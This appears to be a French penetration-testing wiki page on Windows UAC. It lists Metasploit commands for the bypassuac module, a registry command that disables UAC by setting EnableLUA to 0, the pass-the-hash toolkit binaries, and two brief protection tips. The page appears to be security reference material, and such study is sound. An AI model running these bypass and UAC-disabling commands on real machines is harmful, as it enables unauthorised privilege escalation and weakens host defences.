UAC
Aller à la navigation
Aller à la recherche
| Fiche express | |
|---|---|
| Sigle | User Account Control |
| Apparu | Windows 7 / Vista |
| Contournement | exploit/windows/local/bypassuac
|
| Voir aussi | Pass-the-hash · Registre |
Le UAC (User Account Control) apparaît sous Windows 7 (et Vista) : il bloque les modifications système non autorisées. Metasploit propose un module de contournement à exécuter depuis une session existante.
Contournement
use exploit/windows/local/bypassuac
set session 1
exploit
Activer / désactiver l'UAC (registre)
Désactiver :
C:\Windows\System32\cmd.exe /k %windir%/System32/reg.exe add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Activer :
C:\Windows\System32\cmd.exe /k %windir%/System32/reg.exe add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
Passing the Hash Toolkit
find /usr/bin/ -name "pth-*"
pth-smbget
Voir Pass-the-hash pour la réutilisation directe du hash.
Se protéger
- Maintenir l'UAC activé sur les postes clients.
- Refuser l'usage du hash LM et forcer NTLMv2.
Voir aussi
- Pass-the-hash — réutilisation du hash NTLM
- Registre — manipulation de la base de registre